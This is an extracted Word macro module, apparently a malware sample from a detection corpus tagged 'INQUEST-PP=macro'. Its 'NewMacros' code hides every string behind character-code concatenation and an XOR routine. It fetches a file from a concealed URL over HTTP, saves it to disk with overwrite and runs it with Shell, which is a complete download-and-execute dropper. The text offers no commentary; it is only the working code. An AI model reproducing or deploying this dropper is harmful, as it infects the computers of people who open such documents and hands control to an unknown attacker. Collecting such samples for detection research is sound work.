Attribute VB_Name = "NewMacros"
Function mcpd(str As String) As Variant: Dim bytes() As Byte: bytes = str: mcpd = bytes: End Function
Function qgxl(bytes() As Byte) As String: Dim str As String: str = bytes: qgxl = str: End Function

Function mr2av27t(str As String) As String
    Const p_ As String = "wjqhxqyi"
    Dim sb_() As Byte, pb_() As Byte
    sb_ = mcpd(str)
    pb_ = mcpd(p_)
    
    Dim uL As Long
    uL = UBound(sb_)
    
    ReDim scb_(0 To uL) As Byte
    
    Dim idx As Long
    
    For idx = LBound(sb_) To uL:
        If Not sb_(idx) = 0 Then
            c = sb_(idx)
            For i = 0 To UBound(pb_):
                c = c Xor pb_(i)
            Next i
            scb_(idx) = c
        End If
    
    Next idx
    
    mr2av27t = qgxl(scb_)
End Function


Sub mr45hjhn()

Dim nsumvlsd As String
nsumvlsd = mr2av27t(Chr(117) & "" & Chr(105) & "" & Chr(105) & "" & "m" & "n" & "" & "'" & "" & Chr(50) & "" & "2" & "" & "~" & "y" & "" & "s" & "0" & "" & "/" & "" & "(" & "" & "3" & Chr(124) & "s" & "" & "r" & "" & "s" & "" & "{" & "" & Chr(116) & "" & Chr(113) & "" & Chr(120) & "" & Chr(51) & "" & "~" & Chr(114) & "" & "p" & "2" & "" & Chr(101) & "" & ")" & Chr(117) & "," & "" & "l" & "" & Chr(43) & "" & "X" & "" & Chr(124) & "" & "s" & "" & "%" & "" & "2" & Chr(40) & Chr(41) & Chr(121) & "" & Chr(124) & "" & Chr(123) & Chr(44) & Chr(123) & "" & "y" & "" & Chr(48) & "," & "" & "(" & "" & Chr(42) & "(" & "%" & Chr(41) & Chr(46) & "(" & "" & Chr(46) & Chr(36) & "2" & Chr(109) & Chr(104) & "" & Chr(105) & Chr(105) & "d" & Chr(51) & "" & "x" & Chr(101) & "" & "x")

Dim vit2t3n7 As Object
Set vit2t3n7 = CreateObject(mr2av27t(Chr(80) & "" & Chr(116) & "" & "~" & "o" & Chr(114) & "" & Chr(110) & "r" & Chr(123) & "i" & Chr(51) & Chr(69) & "" & "P" & "" & "Q" & "U" & Chr(73) & "" & Chr(73) & Chr(77)))
vit2t3n7.Open mr2av27t("Z" & "" & "X" & "" & Chr(73)), nsumvlsd, False
vit2t3n7.send

If (vit2t3n7.Status = 200) Then
    Set oStream = CreateObject(mr2av27t("\" & "" & "Y" & "" & Chr(82) & "Y" & "" & "_" & "3" & "" & "N" & "" & "i" & "" & "o" & "x" & Chr(124) & "" & "p"))
    oStream.Open
    oStream.Type = 1
    oStream.Write vit2t3n7.responseBody
    oStream.SaveToFile mr2av27t("^" & "" & "'" & "A" & Chr(72) & Chr(110) & "" & "x" & "" & "o" & "n" & "" & Chr(65) & "\" & "" & "y" & "p" & "" & Chr(116) & Chr(115) & Chr(116) & Chr(110) & Chr(105) & "" & "o" & Chr(124) & Chr(121) & "" & "r" & Chr(111) & Chr(65) & Chr(92) & "m" & Chr(109) & "" & Chr(89) & "" & Chr(124) & "i" & "" & Chr(124) & "A" & Chr(81) & "" & Chr(114) & "" & Chr(126) & "" & "|" & Chr(113) & Chr(65) & Chr(73) & "x" & Chr(112) & "" & "m" & "" & "A" & Chr(123) & "t" & "q" & "" & Chr(120) & Chr(51) & "x" & "" & Chr(101) & "" & "x" & ""), 2  ' 1 = no overwrite, 2 = overwrite
    oStream.Close
End If

Shell (mr2av27t("^" & "" & "'" & "A" & Chr(72) & Chr(110) & "" & "x" & "" & "o" & "n" & "" & Chr(65) & "\" & "" & "y" & "p" & "" & Chr(116) & Chr(115) & Chr(116) & Chr(110) & Chr(105) & "" & "o" & Chr(124) & Chr(121) & "" & "r" & Chr(111) & Chr(65) & Chr(92) & "m" & Chr(109) & "" & Chr(89) & "" & Chr(124) & "i" & "" & Chr(124) & "A" & Chr(81) & "" & Chr(114) & "" & Chr(126) & "" & "|" & Chr(113) & Chr(65) & Chr(73) & "x" & Chr(112) & "" & "m" & "" & "A" & Chr(123) & "t" & "q" & "" & Chr(120) & Chr(51) & "x" & "" & Chr(101) & "" & "x" & ""))

End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


INQUEST-PP=macro
